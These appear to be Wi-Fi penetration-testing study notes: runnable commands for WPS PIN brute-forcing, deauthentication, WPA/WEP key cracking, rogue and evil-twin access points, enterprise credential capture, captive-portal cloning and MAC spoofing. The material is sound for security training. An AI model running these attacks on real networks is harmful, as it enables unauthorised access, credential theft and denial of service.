Contents
- Basic Commands
- Wi-Fi Protected Setup (WPS)
- WPA-PSK
- Rogue Access Points
- WPA Enterprise
- Wired Equivalent Privacy (WEP)
- Bettercap
- Attacking Captive Portals
- Macchanger
Other Notes
- https://gist.github.com/dogrocker/86881d2403fee138487054da82d5dc2e
- https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
Basic Commands
sudo airmon-ng # reveals wireless device drivers + chipset
sudo lsusb -vv # reveals system USB devices
# Wi-Fi Configuration Utilities
## Wireless devices information
sudo iw list
## Scan for Wireless AP in range (Managed mode only)
sudo iw dev wlan0 scan | grep SSID
## Determining Channel Number
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"
## Create new virtual interface [wlan0 device, interface add, name, monitor mode]
sudo iw dev wlan0 interface add wlan0mon type monitor
## Bring up the interface post creation
sudo ip link set wlan0mon up
## Inspect new virtual interface information
sudo iw dev wlan0mon info
## Capture wireless frames via tcpdump
sudo tcpdump -i wlan0mon
## Delete virtual interface
sudo iw dev wlan0mon interface del
## Display regulatory information [power limits, restricted frequencies, manufacturer restrictions]
sudo iw reg get
sudo iw reg set AU # Can be overwritten by AP advertising a country
/etc/default/crda # Modify REGDOMAIN to always set at boot
# Enable or Disable Wireless Devices [Wi-Fi, Bluetooth, Broadband etc.]
## Display all enabled wireless devices
sudo rfkill list
## Soft block/unblock device
sudo rfkill block [ID]
sudo rfkill unblock [ID]
sudo rfkill block all
sudo rfkill unblock all
# Enable and disable monitor mode on wireless devices
sudo airmon-ng
sudo airmon-ng check # Check for processes that interrupt with tool
sudo airmon-ng check kill # gracefully stop identified services
# Use dhclient / wpa_supplicant after monitor mode for internet access
# Use hostapd for access point mode
sudo airmon-ng start wlan0 # start monitor mode
sudo airmon-ng start wlan0 3 # start on specified channel
sudo airmon-ng --verbose
sudo airmon-ng --debug
sudo airmon-ng stop wlan0
Wi-Fi Protected Setup (WPS)
- Requirements:
- WPS must be enabled
- WPS must be using pin authentication and not PBC (Push Button Configuration) or other method ```bash sudo airmon-ng start wlan0 # start monitor mode sudo airmon-ng start wlan0 3 # start on specified channel
Scan WPS (if Lck == yes, cannot use WPS attack)
sudo wash -i wlan0 sudo wash -i -5 wlan0 # 5 GHz sudo airodump-ng wlan0 –wps
Attacking WPS
sudo reaver -b 34:08:04:09:3D:38 -i wlan0 -v sudo reaver -b 34:08:04:09:3D:38 -i wlan0 -v -c [channel] # If stuck on wait for beacon sudo reaver -b 34:08:04:09:3D:38 -i wlan0mon -v -K # PixieWPS attack add-on sudo bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
With bully and reaver we can use the -p ‘’ option to check if the pin is empty
Known default pins
sudo apt install airgeddon source /usr/share/airgeddon/known_pins.db echo ${PINDB[“0013F7”]} # first three bytes of BSSID, manually test these with reaver or bully
Rainbow Table (Precalculated)
https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/5%20-%20WPA%20and%20WPA2.md
Common issues
WPS Transaction Failure: Found pin via PixieWPS, but might need to restart reaver without PixieWPS option
ACK Issues: try a different wireless card with a different chipset
WPS Lock: When WPS is locked, we can do a denial of service on the access point using mdk31 or its successor, mdk4.
## WPA-PSK
```bash
sudo airmon-ng check kill # kill interrupting services
sudo airmon-ng start wlan0 # monitor mode
sudo airodump-ng wlan0 # identify SSIDs and channels
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon # save output to file
# Deauthentication
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon
aircrack-ng -w /usr/share/john/password.lst -e wifu -b 34:08:04:09:3D:38 wpa-01.cap # crack the hash using aircrack
airdecap-ng -b 34:08:04:09:3D:38 -e wifu -p 12345678 wpa-01.cap # decrypt the traffic using password, only works if full handshake is in the packet
# Using hashcat (deprecated)
hashcat -I
hashcat --help
hashcat -b -m 2500 # WPA-EAPOL-PBKDF2
hashcat -m 2500 output.hccapx /usr/share/john/password.lst # only works with full WPA handshake
sudo apt install hashcat-utils # deprecated
/usr/lib/hashcat-utils/cap2hccapx.bin wifu-01.cap output.hccapx # exports WPA handshakes from PCAP files to HCCAPx
https://github.com/ZerBea/hcxtools # apt install hcxtools
/usr/bin/hcxpcapngtool wpa-02.cap -o output
hashcat -m 22000 output /usr/share/john/password.lst # needs 4GB ram
./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName> # JTR
john --wordlist=/usr/share/john/password.lst --rules --stdout | grep -i Password123
john --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -e wifu -w - ~/wpa-01.cap
# Can also use crunch or RSMangler
Rogue Access Points
sudo airodump-ng -w discovery --output-format pcap wlan0 # capture and save output
# Wireshark
wlan.fc.type_subtype == 0x08 && wlan.ssid == "Test" # Find beacon packets, filter using "Tagged Parameters"
# Rogue AP
sudo apt install hostapd-mana
Test-mana.conf
------------------------
interface=wlan0
ssid=Test
channel=1
hw_mode=g # or 'a' for 5 GHz
ieee80211n=1
wpa=3 # for WPA and WPA2
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP CCMP # WPA
rsn_pairwise=TKIP CCMP # WPA2
mana_wpaout=/home/kali/mostar.hccapx
# WPA3 downgrade attack
# wpa value should be set to "2", there shouldn't be a wpa_pairwise parameter, and rsn_pairwise should be set to "CCMP" only
------------------------
sudo hostapd-mana Test-mana.conf # start rogue AP
sudo aireplay-ng -0 0 -a FC:7A:2B:88:63:EF wlan1mon # deauthenticate all clients continuously (channel 1)
aircrack-ng mostar.hccapx -e Mostar -w /usr/share/john/password.lst # crack password hash
WPA Enterprise
# Follow this if stuck
https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/6%20-%20WPA%20enterprise.md
sudo airodump-ng wlan0 # enumerate channels
# Wireshark
openssl x509 -in CERT_FILENAME -noout -enddate # determine expiration date of certificate
openssl x509 -inform der -in CERTIFICATE_FILENAME -text # display information in certificate
openssl x509 -inform der -in CERTIFICATE_FILENAME -outform pem -out OUTPUT_PEM.crt # convert to PEM format, which is base64 of der
# Capturing certificate
sudo airodump-ng -c 3 -w wpa --essid wifu --bssid 34:08:04:09:3D:38 wlan0mon # save output to file
sudo aireplay-ng -0 1 -a 34:08:04:09:3D:38 -c 00:18:4D:1D:A8:1F wlan0mon # deauthentication of user to capture certificate
# Retrieving certificate
sudo airmon-ng stop wlan0 # stop monitor mode
# Wireshark
# search tls.handshake.certificate || tls.handshake.type == 11
# 'Handshake Protocol: Certificate'
# right click and select Export Packet Bytes to save the data into a file with a .der extension
# RADIUS Server and modify certificate
sudo apt install freeradius
sudo -s
cd /etc/freeradius/3.0/certs
nano ca.cnf # modify certificate authority
...
[certificate_authority]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = ca@playtronics.com
commonName = "Playtronics Certificate Authority"
...
nano server.cnf # modify server file
...
[server]
countryName = US
stateOrProvinceName = CA
localityName = San Francisco
organizationName = Playtronics
emailAddress = admin@playtronics.com
commonName = "Playtronics"
...
root@kali:/etc/freeradius/3.0/certs# rm dh # regenerate 2048 diffle-hellman from 1024
root@kali:/etc/freeradius/3.0/certs# make # make destroycerts to reset
# Creating rogue AP server
sudo apt install hostapd-mana
# /etc/hostapd-mana/mana.conf --> See mana.conf file
# /etc/hostapd-mana/mana.eap_user --> See mana.eap_user
sudo hostapd-mana /etc/hostapd-mana/mana.conf
sudo hostapd-mana /etc/hostapd-mana/mana.conf -B # background
# Credentials
/tmp/hostapd.credout
asleap -C ce:b6:98:85:c6:56:59:0c -R 72:79:f6:5a:a4:98:70:f4:58:22:c8:9d:cb:dd:73:c1:b8:9d:37:78:44:ca:ea:d4 -W /usr/share/john/password.lst # cracking
# Attack escalation
+ crackapd # let users connect to rogue AP
+ # allow internet access + DHCP and nftable rules
+ # authenticate to the real AP
+ # keep deauthenticating until user connects to fake AP
Wired Equivalent Privacy (WEP)
# Sometimes aircrack doesn't return the ascii version of the key but we can connect to the network with the hex (without the ":" ).
# Follow this if stuck: https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/4%20-%20WEP.md
sudo aircrack-ng start wlan0 # monitor mode
# Scan for WEP networks
sudo airodump-ng --encrypt WEP $wlan_interface
sudo airodump-ng --bssid <bssid> --channel <channel> --write out wlan0mon
# Gather a large amount of IVs
sudo airodump-ng --channel $channel --bssid 'TA:RG:ET:BS:SI:DD' --write $output_file $wlan_interface
# Fake authentication
sudo aireplay-ng --fakeauth 0 -a <AP bssid> -h <MAC wlan0mon> wlan0mon
sudo aireplay-ng --fakeauth 0 -a CC:32:E5:EB:E2:E0 wlan0
# Deauth clients
sudo aireplay-ng --deauth 10 -a 'TA:RG:ET:BS:SI:DD' $wlan_interface
# ARP Replay
sudo aireplay-ng --arpreplay -b 'TA:RG:ET:BS:SI:DD' $wlan_interface
# Fragment
sudo aireplay-ng --fragment -F -b 'TA:RG:ET:BS:SI:DD' $wlan_interface
# Chop chop
sudo aireplay-ng --chopchop -F -b 'TA:RG:ET:BS:SI:DD' -h 'CL:IE:NT:BS:SI:DD' $wlan_interface
# Shared key authentication (requires MAC spoofing of legitimate user, or capture authentication of user and downgrade using plaintext attack)
aircrack-ng [file-name].cap # crack the hash
Bettercap
sudo apt install bettercap
sudo bettercap -iface wlan0 # need monitor on and check kill
# commands
help
clear
wifi.recon on
wifi.show
set ticker.commands "clear; wifi.show" # occassionally execute
ticker on
ticker off # after enough data is obtained
# sorting
set wifi.show.sort clients desc
set wifi.show.filter "WPA2"
# recon
wifi.recon c6:2d:56:2a:53:f8
wifi.show # show clients
set wifi.show.filter ^c0 # begins with
set wifi.rssi.min -49 # min signal strength
# deauth
wifi.deauth c6:2d:56:2a:53:f8
wifi.deauth ac:22:0b:28:fd:22 # specific client
wifi.recon off
get wifi.handshakes.file
set wifi.handshakes.file "/home/kali/handshakes/"
set wifi.handshakes.aggregate false
wifi.recon on
wifi.deauth c6:2d:56:2a:53:f8
Caplets + Web Interfaces
sudo bettercap -iface wlan0 -eval "set ticker.commands 'clear; wifi.show'; wifi.recon on; ticker on"
Kismet
sudo apt install kismet
Attacking Captive Portals (Not really examinable)
sudo airmon-ng start wlan0 # monitor mode
sudo airodump-ng -w discovery --output-format pcap wlan0 # capture networks
sudo aireplay-ng -0 0 -a 00:0E:08:90:3A:5F wlan0mon # deauth client
sudo apt install apache2 libapache2-mod-php # install Apache and PHP
wget -r -l2 https://www.megacorpone.com # download front-end directories
# copying assets
sudo cp -r ./www.megacorpone.com/assets/ /var/www/html/portal/
sudo cp -r ./www.megacorpone.com/old-site/ /var/www/html/portal/
Macchanger
sudo apt install macchanger
macchanger -h
macchanger --mac XX:XX:XX:XX:XX:XX
ifconfig wlan0mon down
macchanger –-mac <VictimMac> wlan0mon
ifconfig wlan0mon up
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
Return to Normal
sudo airmon-ng stop wlan0
service networking restart
service network-manager restart
Connecting to Wireless AP
# For all config files: https://github.com/dh0ck/Wi-Fi-Pentesting-Cheatsheet/blob/main/Wifi/cheatsheet/0%20-%20connect%20to%20networks.md
# Open Authentication
network={
ssid="hotel_wifi"
scan_ssid=1
}
# WPA-PSK
network={
ssid="home_network"
scan_ssid=1
psk="correct battery horse staple"
key_mgmt=WPA-PSK
}
sudo wpa_supplicant -i wlan0 -c wifi-client.conf [-B for background]
sudo dhclient wlan0 # dhcp
Setting up access point
sudo iw list
sudo ip link set wlan0 up # setting up static ip
sudo ip addr add 10.0.0.1/24 dev wlan0
---dnsmasq.conf # for dhcp
# Main options
# http://www.thekelleys.org.uk/dnsmasq/docs/dnsmasq-man.html
domain-needed
bogus-priv
no-resolv
filterwin2k
expand-hosts
domain=localdomain
local=/localdomain/
# Only listen on this address. When specifying an
# interface, it also listens on localhost.
# We don't want to interrupt any local resolution
listen-address=10.0.0.1
# DHCP range
dhcp-range=10.0.0.100,10.0.0.199,12h
dhcp-lease-max=100
# Router: wlan0
dhcp-option=option:router,10.0.0.1
dhcp-authoritative
# DNS: Primary and secondary Google DNS
server=8.8.8.8
server=8.8.4.4
---
sudo dnsmasq --conf-file=dnsmasq.conf
Cracking WPA2-Managed Handshakes
- Copy the username:hash sections from
/etc/hostapd-wpe/hostapd-wpe.loginto another file and run john or hashcat - john:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep jtr | cut -f 4 | sort -u -t: -k1,1 > /tmp/jtr.txtjohn jtr.txt --wordlist=/usr/share/wordlists/rockyou.txt
- hashcat:
cat /etc/hostapd-wpe/hostapd-wpe.log | grep hashcat | cut -f 3 | sort -u -t: -k1,1 > /tmp/hcat.txthashcat -m 5500 hcat.txt /usr/share/wordlists/rockyou.txt
Creating Custom Dictionaries
- Create
words.txttargetap - Permutate this wordlist with l33tsp34k rules
john --wordlist=words.txt --rules=NT --stdout | sort -u > dictionary1.txtjohn --wordlist=dictionary1.txt --rules=l33t --stdout | sort -u > dictionary2.txtjohn --wordlist=dictionary2.txt --rules=l33t --stdout | sort -u > dictionary3.txtjohn --wordlist=dictionary3.txt --rules=l33t --stdout | sort -u > dictionary4.txt
Decrypting WPA2 Traffic
- Decrypt with
airdecap-ng -e TargetAP -b 18:80:90:6E:E7:A4 -p "APPassword" ch11-05.cap
- Tip: You can leave airodump running to continue capture while you work at decrypting.
- Open with Wireshark
wireshark ch11-05-dec.cap
- Try some basic filters
tcp.port eq 80tcp.port eq 21
Connecting to Wireless Networks
wpa_passphrase "TargetAP" "12345678" > TargetAP.confsudo wpa_supplicant -i wlan0mon -c TargetAP.conf -diwconfig to check status